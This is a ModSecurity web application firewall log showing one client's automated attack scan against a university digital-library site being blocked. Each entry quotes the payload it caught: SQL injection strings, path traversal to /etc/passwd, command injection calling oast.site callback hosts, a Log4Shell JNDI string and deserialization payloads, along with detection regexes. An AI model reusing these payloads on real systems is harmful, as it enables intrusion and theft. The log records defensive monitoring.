[Tue Aug 29 11:32:36.357278 2023] [:error] [pid 1101] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'hsvT'='hsvT found within ARGS:username: 1@a.com' AND (SELECT 6427 FROM (SELECT(SLEEP(5)))LwLu) AND 'hsvT'='hsvT"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/login.php"] [unique_id "ZO105MCo-f0AAARNk5IAAAAS"]
[Tue Aug 29 11:32:37.428903 2023] [:error] [pid 1085] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:text. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:text: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/vendor/htmlawed/htmlawed/htmLawedTest.php"] [unique_id "ZO105cCo-f0AAAQ9H4oAAAAK"]
[Tue Aug 29 11:32:38.406207 2023] [:error] [pid 1100] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:sccp_id[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:sccp_id[]: 3) AND (SELECT 5921 FROM (SELECT(SLEEP(6)))LxjM) AND (7754=775"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO105sCo-f0AAARMMc4AAAAR"]
[Tue Aug 29 11:32:38.406394 2023] [:error] [pid 1096] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:account_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../ found within ARGS:account_name: /../../../var/www/php/2Udxk4kPA8EFcUByGpoyFb9vAvx.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/v1/backend1"] [unique_id "ZO105sCo-f0AAARIwJsAAAAO"]
[Tue Aug 29 11:32:40.411426 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-654}${:-523}.${hostName}.postdata.cjmn8l5jmimk2adbbnlg4qs1pi6wtgf1w.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/opennms/j_spring_security_check"] [unique_id "ZO106MCo-f0AAARQ318AAAAB"]
[Tue Aug 29 11:32:42.485039 2023] [:error] [pid 1101] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:language: ../../../../../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/tiki-jsplugin.php"] [unique_id "ZO106sCo-f0AAARNk54AAAAS"]
[Tue Aug 29 11:32:46.405380 2023] [:error] [pid 1107] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:g. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../ found within ARGS:g: core-r7rules/../../../hello.php."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/photo/combine.php"] [unique_id "ZO107sCo-f0AAARTEJQAAAAG"]
[Tue Aug 29 11:32:47.535238 2023] [:error] [pid 1100] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:button. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x83\\x81\\x81[\\x83\\x8b\\x91\\x97\\x90 found within ARGS:button: \\x83\\x81\\x81[\\x83\\x8b\\x91\\x97\\x90M"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/conf_mail.php"] [unique_id "ZO1078Co-f0AAARMMeEAAAAR"]
[Tue Aug 29 11:32:47.611522 2023] [:error] [pid 1100] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: \\x00 found within ARGS:file: ;echo CVE-2023-23333|rev\\x00.zip"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/downloader.php"] [unique_id "ZO1078Co-f0AAARMMeQAAAAR"]
[Tue Aug 29 11:32:49.412348 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within XML: \\x0a\\x0a\\x0a\\x0a\\x0arO0ABXNyABtqYXZheC5tYW5hZ2VtZW50Lk9iamVjdE5hbWUPA6cb620VzwMAAHhwdACxV2ViU3BoZXJlOm5hbWU9Q29uZmlnU2VydmljZSxwcm9jZXNzPXNlcnZlcjEscGxhdGZvcm09cHJveHksbm9kZT1MYXAzOTAxM05vZGUwMSx2ZXJzaW9uPTguNS41LjcsdHlwZT1Db25maWdTZXJ2aWNlLG1iZWFuSWRlbnRpZmllcj1Db25maWdTZXJ2aWNlLGNlbGw9TGFwMzkwMTNOb2RlMDFDZWxsLHNwZWM9MS4weA==\\x0agetUnsavedChanges\\x0arO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAx3CAAAABAAAAABc3IADGphdmEubm..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTA [hostname "digilib.unla.ac.id"] [uri "/"] [unique_id "ZO108cCo-f0AAARQ32cAAAAB"]
[Tue Aug 29 11:32:49.424282 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:<?xml version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22?> < found within ARGS:<?xml version: \\x221.0\\x22 encoding=\\x22ISO-8859-1\\x22?> <methodCall> <methodName>openads.spc</methodName> <params> <param> <value> <struct> <member> <name>remote_addr</name> <value>8.8.8.8</value> </member> <member> <name>cookies</name> <value> <array> </array> </value> </member> </struct> </value> </param> <param><value><string>a:1:{S:4:\\x22what\\x22;O:11:\\x22Pdp\\x5cUri\\x5cUrl\\x22:1:{S:17:\\x22\\x5c00Pdp\\x5c5CUri\\x5c5CUrl\\x5c00host\\x22;O:21:\\x22League\\x5cFlysystem\\..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/adxmlrpc.php"] [unique_id "ZO108cCo-f0AAARA7b4AAAAA"]
[Tue Aug 29 11:32:51.453327 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union select found within ARGS:id: -1 union select md5(999999999)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/admin/ajax/avatar.php"] [unique_id "ZO1088Co-f0AAAPDoJIAAAAP"]
[Tue Aug 29 11:32:59.299044 2023] [:error] [pid 1095] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cycle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ,(@@ found within ARGS:cycle: 1 UNION ALL SELECT 1,(@@version)-- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/glpi/scripts/unlock_tasks.php"] [unique_id "ZO10@8Co-f0AAARH7LAAAAAM"]
[Tue Aug 29 11:32:59.351399 2023] [:error] [pid 1101] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cycle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ,(@@ found within ARGS:cycle: 1 UNION ALL SELECT 1,(@@version)-- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/scripts/unlock_tasks.php"] [unique_id "ZO10@8Co-f0AAARNk7IAAAAS"]
[Tue Aug 29 11:32:59.785050 2023] [:error] [pid 1100] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:token. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:token: `wget http:/cjmn8l5jmimk2adbbnlgqqxagan3rmo4s.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/storfs-asup"] [unique_id "ZO10@8Co-f0AAARMMfMAAAAR"]
[Tue Aug 29 11:33:05.763737 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:value. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')\\x0a@ found within ARGS:value: @GrabConfig(disableChecksums=true)\\x0a@GrabResolver(name='test', root='http://aaa')\\x0a@Grab(group='package', module='vulntest', version='1')\\x0aimport Payload;"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile"] [unique_id "ZO11AcCo-f0AAARA7c8AAAAA"]
[Tue Aug 29 11:33:09.407363 2023] [:error] [pid 1101] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  -- - found within ARGS:username: ' OR 1=1 -- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/classes/Login.php"] [unique_id "ZO11BcCo-f0AAARNk8MAAAAS"]
[Tue Aug 29 11:33:09.896871 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:Form1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: $ found within ARGS:Form1: $TextField$0,$Submit,$Submit$0"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilib.unla.ac.id"] [uri "/app"] [unique_id "ZO11BcCo-f0AAARQ35sAAAAB"]
[Tue Aug 29 11:33:10.341519 2023] [:error] [pid 1091] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:Form1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: $ found within ARGS:Form1: $TextField$0,$Submit,$Submit$0"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilib.unla.ac.id"] [uri "/app"] [unique_id "ZO11BsCo-f0AAARD1SMAAAAH"]
[Tue Aug 29 11:33:11.303356 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:type: |cat/etc/passwd||"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/webadm/"] [unique_id "ZO11B8Co-f0AAARdiGoAAAAK"]
[Tue Aug 29 11:33:12.510868 2023] [:error] [pid 1105] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:docid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:docid: 1 AND (SELECT 6288 FROM (SELECT(SLEEP(6)))HRaz)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11CMCo-f0AAARR26oAAAAF"]
[Tue Aug 29 11:33:12.629109 2023] [:error] [pid 1091] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmn8l5jmimk2adbbnlgwaqcmtzfh5aon.oast.site found within TX:1: cjmn8l5jmimk2adbbnlgwaqcmtzfh5aon.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilib.unla.ac.id"] [uri "/"] [unique_id "ZO11CMCo-f0AAARD1TEAAAAH"]
[Tue Aug 29 11:33:12.786682 2023] [:error] [pid 1105] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:hostname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: `id found within ARGS:hostname: `id`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/controller/ping.php"] [unique_id "ZO11CMCo-f0AAARR27EAAAAF"]
[Tue Aug 29 11:33:12.804168 2023] [:error] [pid 1107] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmn8l5jmimk2adbbnlg4apxr71qqr5n5.oast.site found within TX:1: cjmn8l5jmimk2adbbnlg4apxr71qqr5n5.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilib.unla.ac.id"] [uri "/"] [unique_id "ZO11CMCo-f0AAARTEMAAAAAG"]
[Tue Aug 29 11:33:13.297729 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmn8l5jmimk2adbbnlgxebnah85prba7.oast.site found within TX:1: cjmn8l5jmimk2adbbnlgxebnah85prba7.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilib.unla.ac.id"] [uri "/"] [unique_id "ZO11CcCo-f0AAAQKOikAAAAs"]
[Tue Aug 29 11:33:13.336646 2023] [:error] [pid 1105] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmn8l5jmimk2adbbnlgfapbcz8dorg5i.oast.site found within TX:1: cjmn8l5jmimk2adbbnlgfapbcz8dorg5i.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilib.unla.ac.id"] [uri "/"] [unique_id "ZO11CcCo-f0AAARR27UAAAAF"]
[Tue Aug 29 11:33:14.390580 2023] [:error] [pid 1105] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:stagingTaskData. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /\\x22>\\x0a  < found within ARGS:stagingTaskData: <SOAP-ENV:Envelope xmlns:xsi=\\x22http://www.w3.org/2001/XMLSchema-instance\\x22 xmlns:xsd=\\x22http://www.w3.org/2001/XMLSchema\\x22 xmlns:SOAP-ENC=\\x22http://schemas.xmlsoap.org/soap/encoding/\\x22 xmlns:SOAP-ENV=\\x22http://schemas.xmlsoap.org/soap/envelope/\\x22 xmlns:clr=\\x22http://schemas.microsoft.com/soap/encoding/clr/1.0\\x22 SOAP-ENV:encodingStyle=\\x22http://schemas.xmlsoap.org/soap/encoding/\\x22>\\x0a  <SOAP-ENV:Body>\\x0a    <a1:WindowsIden..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData"] [unique_id "ZO11CsCo-f0AAARR27cAAAAF"]
[Tue Aug 29 11:33:14.454568 2023] [:error] [pid 1101] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:inUrl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:inUrl: file///etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/wavemaker/studioService.download"] [unique_id "ZO11CsCo-f0AAARNk9kAAAAS"]
[Tue Aug 29 11:33:14.562230 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchField. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:searchField: antani' union select (select concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d) limit 0,1),NULL,NULL,NULL,NULL -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/compliancepolicyelements.inc.php"] [unique_id "ZO11CsCo-f0AAANsAdQAAAAD"]
